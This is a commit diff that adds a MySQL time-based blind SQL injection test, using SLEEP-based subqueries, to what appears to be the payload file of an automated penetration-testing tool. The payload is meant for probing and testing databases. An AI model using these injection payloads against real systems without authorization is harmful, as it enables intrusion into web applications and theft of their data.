Add Burp Suite payload "(select_from(select(sleep(20)))a)" query custom sleep

This commit is contained in:
Ekzorcist 2019-02-09 19:50:45 +03:00
parent 9562502744
commit 35100557d6

View File

@ -104,6 +104,26 @@
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (query CUSTOM_1 SLEEP)</title>
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
<stype>5</stype>